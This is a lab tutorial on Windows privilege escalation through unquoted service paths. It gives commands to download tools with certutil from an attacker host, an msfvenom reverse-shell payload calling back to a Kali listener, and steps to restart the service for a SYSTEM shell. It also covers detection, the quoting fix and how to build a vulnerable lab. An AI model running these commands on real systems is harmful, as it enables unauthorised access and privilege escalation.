What is an Unquoted Service Path
An unquoted service path is a type of vulnerability where the path to an executable used by a service contains spaces and is not enclosed in quotation marks. This can cause the system to execute unintended commands.
For example, take a service named service123 running with SYSTEM privileges. The service executable is located in:
[C:\Program Files\Crazy Services\First Service\service123.exe]
This service has the unquoted service path vulnerability because it has spaces in the path and the path isn’t enclosed in quotes. To take advantage of this vulnerability the attacker first checks if they have privileges to write a file somewhere in the path. Once that is confirmed, the attacker creates a reverse shell executable using msfvenom and names it First.exe. The attacker then puts that malicious file in this path:
[C:\Program Files\Crazy Services\First.exe]
When the service is restarted, it’ll execute the file First.exe.
Since the service is what executes the malicious file, if the service is running with SYSTEM privileges it will give the attacker SYSTEM privileges. Also note that the attacker will need to find a way to start or restart the service in order to make it execute the new file. I will show you two different ways to start a service in the walkthroughs below.
Why does it do this?
Lets look back at that previous example and assume there is a service named service123 which is running this executable:
[C:\Program Files\Crazy Services\First Service\service123.exe]
When Windows is searching for a service executable file, it follows a specific order. For example, if it’s looking for “service123.exe,” it will look in the following directories in order (assuming the unquoted service path vulnerability is present):
- C:\Program.exe
- C:\Program Files\Crazy.exe
- C:\Program Files\Crazy Services\First.exe
- C:\Program Files\Crazy Services\First Service\service123.exe
Walk-through (Method 1)
NOTE: The service needs to be started/restarted for the exploit to work. I will show two ways to start the service. Method one is starting the service with the “net start” command. Method two is by restarting the entire machine with the shutdown command.
Tools used: winpeas.exe
IPs: Kali – 10.0.2.11 | Windows – 10.0.2.15
Since this is a privilege escalation demo I’ll start off with a user level shell.
First lets copy winpeas.exe over to enumerate the machine for privilege escalation vulns. Winpeas is a very handy tool, it helps enumerate various different privilege escalation paths in Windows.
We use certutil.exe to copy winpeas over:
certutil.exe -urlcache -f http://<ip>/winpeas.exe winpeas.exe
The output of Winpeas.exe shows a service named vulnserv which has the unquoted service path vulnerability. It seems that we also have permissions to start the service.
winpeas.exe servicesinfo
Lets check what privileges the service is running with. Checking it shows that its running as LocalSystem
sc qc vulnserv
Lets check if we can create files in any of the directories.
type nul > "C:\Program Files\Vuln Services\test.exe"
We are able to create a file in the “Vuln Services” directory.
Now its time for the exploitation. First we create a reverse shell executable named First.exe using msfvenom on Kali.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.2.11 LPORT=53 -f exe > First.exe
Next step is to bring over the reverse shell executable to the Windows machine.
certutil.exe -urlcache -f http://<ip>/First.exe First.exe
We need to place the executable in the proper directory so it executes when the service starts up.
move First.exe "C:\Program Files\Vuln Services\"
Before starting the service, start a netcat listener on your kali.
nc -lnvp 53
Now lets start the service
net start vulnserv
We get a reverse shell back on the netcat listener. Doing whoami shows that we are NT AUTHORITY/SYSTEM
nc -lnvp 53
SeShutdownPrivilege (Method 2)
SeShutdownPrivileges is a privilege that a user might have in Windows. The privilege lets the user use the shutdown command. This privilege is interesting in the context of security because it can be abused by attackers to perform malicious actions such as shutting down or restarting the system.
We’re going to change up Method 1 a bit. Lets say we’re able to put the reverse shell “First.exe” in the vulnerable path but our user does NOT have permissions to start the service.
How do we start the service now? Well, if the service has autostart enabled, that means it will automatically start when the machine is started or restarted.
Let’s try this out!
We’ll run winpeas again to see what it says:
winpeas.exe servicesinfo
It seems like we don’t have permissions to start the service but it is configured to autostart.
Since we don’t have permissions to restart the service, lets check if we have SeShutDownPrivilege. It seems like we do.
whoami /priv
NOTE: Don’t let the “Disabled” fool you. We still have permissions to shutdown the machine. This gives a good explanation as to why it says Disabled but to summarize, its sort of a safety measure to make sure applications don’t accidentally shutdown the machine.
Now lets just copy the exploitation process from Method 1 till we get to starting the service.
With our reverse shell in place, we can restart the machine.
shutdown /r
This will restart the computer in a minute or two
Back on the netcat listener, we get a shell as NT AUTHORITY/SYSTEM.
Manual Enumeration
Its important to understand how to manually enumerate for any unquoted service paths since bringing over winpeas.exe isn’t always possible.
This shows all services with the unquoted service path vulnerability.
wmic service get displayname,name,pathname,startmode | findstr /i /v "c:\windows\\" |findstr /i /v """
This shows the services running with the unquoted service path vulnerability that are also configured to autostart.
wmic service get displayname,name,pathname,startmode | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Fixing the Vulnerability
As fun as it is to exploit vulnerabilities, its also important to understand how to fix them.
To summarize, this is what the goal is…
Before: C:\Program Files\Vuln Services\First Service\service.exe
After: “C:\Program Files\Vuln Services\First Service\service.exe”
To fix this from the very beginning, create your service like this:
sc.exe create vulnserv binPath='"C:\Program Files\Vuln Services\First Service\service.exe"'
Notice the single quote outside of the double quotes
But if you want to fix the vulnerability on an already created service, open up registry editor as an Administrator
Then at the top, search for HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vulnserv (vulnserv is the name of the vulnerable service)
Right click on ImagePath and click modify. Then add quotes to the path
Now lets double check with winpeas.exe to make sure and sure enough, it’s not showing the vulnerability anymore
Steps to recreate Vulnerability
Tools: subinalc.exe
Start up cmd prompt as an Administrator.
First, create the directory where your service executable will be. Make sure the directory path looks similar to the screenshot below. It should have some spaces.
mkdir "C:\Program Files\Vuln Services\First Service"
Then create the service and set the binary path to an executable inside the directory you just created.
sc.exe create vulnserv binPath="C:\Program Files\Vuln Services\First Service\service.exe"
If you want to create the service with auto start, add start=auto to the end.
sc create vulnserv binPath="C:\Program Files\Vuln Services\First Service\service.exe" start=auto
If you want to confirm that the service was created, do:
sc qc vulnserv
Next step is to give users permissions to create files in the “Vuln Services” directory.
Go to the “Vuln Services” directory where the service is stored, right click it and go to the Security tab. From there scroll down, click on Users and click Edit.
From here, click on Users again and click the Full control option to give Users full permissions.
A new user should already have SeShutdownPrivileges enabled so you’re able to test method 2. But if you want to try method 1, use the tool subinacl.exe. Do the following to give a user permissions to start the service:
subinacl.exe /service vulnserv /grant=user1=PTOC
Now switch to the unprivileged user, open command prompt and try to PWN it.
